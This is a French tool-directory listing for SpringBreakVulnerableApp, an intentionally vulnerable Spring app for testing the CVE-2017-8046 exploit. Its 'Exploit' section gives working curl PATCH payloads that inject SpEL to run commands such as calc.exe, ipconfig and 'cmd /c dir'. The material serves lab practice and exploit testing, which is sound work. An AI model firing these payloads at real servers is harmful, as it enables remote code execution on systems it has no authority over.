Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SpringBreakVulnerableApp — AVERTISSEMENT : Ceci est une application vulnérable pour tester l'exploit de la vulnérabilité Spring Break (CVE-2017-8046). Exécutez-la à vos risques et périls ! | Kitploit
Outils/GitHubGitHub/m3ssap0/springbreakvulnerableapp
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubm3ssap0/springbreakvulnerableapp

SpringBreakVulnerableApp

AVERTISSEMENT : Ceci est une application vulnérable pour tester l'exploit de la vulnérabilité Spring Break (CVE-2017-8046). Exécutez-la à vos risques et périls !

Voir le dépôt
14103il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Application Vulnérable Spring Break

Ceci est une application vulnérable pour tester l'exploit de la vulnérabilité Spring Break (CVE-2017-8046).

ATTENTION !

Cette application contient de sérieuses failles de sécurité. Utilisez-la à vos risques et périls ! Il est recommandé d'utiliser un environnement sauvegardé et isolé (comme une machine virtuelle avec un instantané récent et un réseau limité à l'hôte). Ne téléchargez pas cette application sur des serveurs accessibles depuis Internet, car ils seront compromis.

AVERTISSEMENT : Je décline toute responsabilité quant à l'utilisation qui est faite de cette application (SpringBreakVulnerableApp). Le seul but de cette application est de servir de scénario de test pour l'exploit Spring Break et elle ne doit pas être utilisée de manière malveillante. Si votre serveur est compromis via une installation de SpringBreakVulnerableApp, cela n'est pas de ma responsabilité mais de celle de la ou des personnes qui l'ont téléchargée et installée.

Informations sur la vulnérabilité

  • CVE-ID : CVE-2017-8046
  • Lien : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
  • Description : Les requêtes PATCH malveillantes soumises aux serveurs spring-data-rest dans les versions Pivotal Spring Data REST antérieures à 2.5.12, 2.6.7, 3.0 RC3, Spring Boot antérieures à , et trains de versions antérieurs à peuvent utiliser des données JSON spécialement conçues pour exécuter du code Java arbitraire.
2.0.0M4
Spring Data
Kay-RC3

Utilisation

L'application peut être lancée avec la commande Maven suivante.

root@kitploit:~
mvn spring-boot:run

Un fichier JAR complet peut être généré avec la commande Maven suivante.

root@kitploit:~
mvn clean install spring-boot:repackage

Pour insérer des données, vous pouvez utiliser la commande curl suivante.

root@kitploit:~
curl -i -X POST -H "Content-Type: application/json" -d '{ "name" : "Test", "attribute" : "foo"}' http://hostname:port/entity

Exploit

L'exploit le plus simple est probablement la requête suivante.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Thread).sleep(10000).x", "value" : "pwned" }]' "http://hostname:port/entity/1"

Sous Windows, le processus calc.exe peut être lancé avec la requête suivante. Des requêtes similaires peuvent être utilisées pour lancer des commandes arbitraires.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Runtime).getRuntime().exec(\"calc.exe\").x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

Pour obtenir la sortie des commandes lancées, certains « gadgets » offerts par le code du Framework Spring peuvent être utilisés. Heureusement, aucune dépendance externe n'est requise. Par exemple, le résultat de la commande ipconfig peut être récupéré avec la requête suivante.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ipconfig\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

Sous Windows, une commande cmd /c dir, et d'autres commandes similaires, peut être lancée avec la requête suivante. Veuillez noter l'astuce utilisée pour insérer le caractère slash en évitant la valeur explicite (c'est-à-dire que les slashes explicites sont remplacés par des points avant le véritable analyse syntaxique).

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"cmd \" + T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F)) + \"c dir\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

Un programme Java pour exploiter cette vulnérabilité est disponible ici.

Auteurs

  • Antonio Francesco Sardella - implémentation - m3ssap0

Licence

Ce projet est sous licence MIT - voir le fichier LICENSE.txt pour plus de détails.

Remerciements

  • Man Yue Mo, le chercheur en sécurité qui a découvert la vulnérabilité
Télécharger l’outil